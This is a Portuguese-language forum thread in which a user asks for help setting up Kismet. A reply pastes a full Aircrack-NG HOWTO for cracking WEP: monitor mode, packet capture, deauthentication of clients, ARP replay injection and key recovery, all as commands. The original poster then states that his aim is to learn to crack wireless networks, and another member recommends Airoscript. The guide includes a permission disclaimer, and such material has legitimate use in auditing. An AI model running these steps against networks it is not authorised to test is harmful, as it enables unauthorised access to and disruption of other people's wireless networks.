Resultados 1 a 5 de 5
Like Tree3Likes
  • 1 Post By DragUnder
  • 2 Post By BmwStreetRacer

Tópico: Configurar kismet

  1. #1
    Membro Silver
    Data de Ingresso
    Oct 2007
    Posts
    101
    Liked
    12 times

    Padrão Configurar kismet



    Boas amigos.

    Tenho ubuntu a rolar no meu pc, e queria agora por o kismet a trabalhar, mas nao estou a conseguir.

    O driver da minha placa de wireless é "rtl8187b-modified", foi aki no forum que resolvi o problema de como por esta placa a trabalhar...

    no kismet.conf configurei o "source=rt8180, wlan0, wlan0", quando tento executar o kismet, da-me isto:

    Launching kismet_server: //usr/bin/kismet_server
    Suid priv-dropping disabled. This may not be secure.
    No specific sources given to be enabled, all will be enabled.
    Non-RFMon VAPs will be destroyed on multi-vap interfaces (ie, madwifi-ng)
    Enabling channel hopping.
    Enabling channel splitting.
    Source 0 ( wlan0): Enabling monitor mode for rt8180 source interface wlan0 channel 6...
    FATAL: GetIFFlags: interface wlan0: No such device
    Done.

    alguem me pode ajudar?

    cumps
    moursika

  2. #2
    Sat Expert Avatar de DragUnder
    Data de Ingresso
    Sep 2007
    Posts
    2.130
    Liked
    1596 times

    Padrão

    tenta fazer estes comandos:

    ifconfig wifi0 up
    ifconfig wifi0 down
    ifconfig wifi0 up

    ou altera a configuração do kismet.conf para algo do género:
    source=rt8180,wifi0,intel

    já agora posta aí o resultado do comando lspci para ver o que aparece.

    Mas eu não domino muito bem o kismet por isso.....

    Vou ver se consigo descobrir.
    Última edição por DragUnder; 28-07-2008 às 21:51.
    linux freedom
    se queres ser inteligente, usa linux
    linux freedom

  3. #3
    Sat Expert Avatar de DragUnder
    Data de Ingresso
    Sep 2007
    Posts
    2.130
    Liked
    1596 times

    Padrão

    Para que necessitas do kismet????
    HOWTO: Aircrack-NG (Simple Guide)
    This HOWTO is widely based on own documentation. In addition you'll find the latest version of "Aircrack Next Generation" and Aircrack-PTW .

    Any suggestions for improvement are welcome. Aim is to keep this HOWTO as simple & comprehensive as possible as I believe that brevity is the soul of wit.

    DISCLAIMER:
    Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network's security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.

    GENERAL INFORMATION:
    Generally speaking there are 3 types of attacks:
    1. Brute force attack
    2. Dictionary attack
    3. Statistical attack
    By exploiting several security weaknesses of the WEP protocol Aircrack NG makes use of a statistical method to recover WEP keys. Provided that you have collected a sufficient number of IVs (= Initialization Vectors) and depending on the length of the encryption key, determining the actual WEP key will take less than a minute on a common PC.

    HARDWARE:
    I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won't go into this. I have tested packet injection and decryption with:
    1. Intel® PRO/Wireless 2200BG (IPW2200)
    2. Linksys WUSB54G V4.0 (RT2570)
    I recommend "Linksys WUSB54G V4.0" as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.

    PREREQUISITES:
    1. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
    2. '00:09:5B7:43:A8' is the MAC address of my network, so you need to replace it with your own.
    3. '00:00:00:00:00:00' is the MAC address of the target client, NOT that of your own wireless card.

    COMMAND LINE:
    Please make sure that you stick to the exact sequence of actions and pay attention to section on MAC filtering.

    • 1. Enable monitoring with "airmon-ng" (screenshot #1):
      Quote:
      sudo airmon-ng start <interface> <channel>

    • 2. Packet capturing with "airodump-ng" (screenshot #2):
      Quote:
      sudo airodump-ng --channel <channel> --write <file_name> <interface>
      Alternatively, try this (to collect data from target network only and hence increase performance):
      Quote:
      sudo airodump-ng --channel <channel> --bssid 00:09:5B7:43:A8 --write <file_name> <interface>
      NOTE:
      --channel... Select preferred channel; optional, however, channel hopping severely impacts and thus slows down collection process.
      --bssid... MAC address of target access point; optional, however, specifying access point will improve performance of collection process.
      --write... Preferred file name; mandatory field (in our case).

    • 3.1. Now check if MAC filtering is enabled or turned off:
      Quote:
      sudo aireplay-ng -1 0 -e <target_essid> -a 00:09:5B7:43:A8 -h MY:MA:CAD:RE:SS <interface>
      NOTE:
      -1... '0' deauthenticates all clients.
      -e... ESSID of target access point.
      -a... MAC address of target access point.
      -h... MAC address of your choice.

    • 3.2. If the resulting output looks like this...
      Quote:
      18:22:32 Sending Authentication Request
      18:22:32 Authentication successful
      18:22:32 Sending Association Request
      18:22:32 Association successful :-)
      ...then MAC filtering is turned off & you can continue following section 'No MAC filtering', otherwise jump to section 'MAC filtering'.
    >> No MAC filtering <<
    • 4. Packet Re-injection with "aireplay-ng" (screenshot #4):
      Quote:
      sudo aireplay-ng -3 -b 00:09:5B7:43:A8 -h MY:MA:CAD:RE:SS <interface>
      You'll now see the number of data packets shooting up in 'airodump-ng'. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point. As MAC filtering is off, use an arbitrary MAC address ('MY:MA:CAD:RE:SS').

      Continue with #6.

      NOTE:
      -3... Standard ARP-request replay.
      -b... MAC address of target access point.
      -h... MAC address of your choice.
    >> MAC filtering <<
    • 4. Deauthentication with "aireplay-ng" (screenshot #3):
      Quote:
      sudo aireplay-ng -0 5 -a 00:09:5B7:43:A8 -c 00:00:00:00:00:00 <interface>
      NOTE:
      -0... Number of deauthentication attempts.
      -a... MAC address of target access point.
      -c... Client MAC address.

    • 5. Packet Re-injection with "aireplay-ng" (screenshot #4):
      Quote:
      sudo aireplay-ng -3 -b 00:09:5B7:43:A8 -h 00:00:00:00:00:00 <interface>
      You'll now see the number of data packets shooting up in 'airodump-ng'. This process can take up to five minutes before you start receiving any ARP requests. So be a little patient at this point.

      NOTE:
      -3... Standard ARP-request replay.
      -b... MAC address of target access point.
      -h... Client MAC address.

    • 6. Decryption with "aircrack-ng" & "aircrack-ptw" (screenshot #5):

      Aircrack-ng:
      Quote:
      sudo aircrack-ng <file_name>.cap
      Aircrack-PTW:
      Quote:
      ./aircrack-ptw <file_name>.cap
    CAPTURING:
    This is a summary based on information given and , respectively:
    Aircrack-NG:
    64-bit key: ~250,000 packets
    128-bit key: ~1,500,000 packets
    Aircrack-PTW:
    64-bit key: ~20,000 packets [estimate]
    128-bit key: ~85,000 packets
    FINALLY:
    That's it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.
    BmwStreetRacer likes this.
    linux freedom
    se queres ser inteligente, usa linux
    linux freedom

  4. #4
    Membro Silver
    Data de Ingresso
    Oct 2007
    Posts
    101
    Liked
    12 times

    Padrão

    Boas;

    ok o meu objectivo ja k estou de ferias é aprender a crakar redes wireless, li uns manuais e e tinha k por isso a funcionar.

    vou tentar colocar o aircrack a dar.

    cumps;
    moursika

  5. #5
    High-Tech Avatar de BmwStreetRacer
    Data de Ingresso
    Sep 2007
    Localização
    Almada
    Posts
    208
    Liked
    59 times

    Padrão

    Boas!
    Faz uma busca a "seguridad wireless" tens la tudo o que precisas para os estudos, desde manuais a aplicaç~es para estudo de redes.

    Eu não mexo com o Kismet mas podes começar por usar o Airoscript em conjunto com o Aircrack.

    O Airoscript substitui completamente o Kismet

    Bons Estudos
    DragUnder and moursika like this.
    ./wireless_attack..........

Informações de Tópico

Usuários Navegando neste Tópico

Há 1 usuários navegando neste tópico. (0 registrados e 1 visitantes)

Tópicos Similares

  1. Configurar DD-WRT
    Por Vertig00 no fórum Modem/routers
    Respostas: 0
    Último Post: 29-04-2011, 11:24
  2. Configurar satelites
    Por sporting69 no fórum Dúvidas / Ajuda
    Respostas: 5
    Último Post: 13-11-2010, 02:40
  3. Configurar FTP
    Por Fidel no fórum Informações, Dicas e tutoriais [Geral]
    Respostas: 1
    Último Post: 18-02-2008, 01:33
  4. Problema a configurar dcc
    Por greatman no fórum Dúvidas / Ajuda
    Respostas: 13
    Último Post: 23-12-2007, 00:20

Tags para este Tópico

Permissões de Postagem

  • Você não pode iniciar novos tópicos
  • Você não pode enviar respostas
  • Você não pode enviar anexos
  • Você não pode editar suas mensagens
  •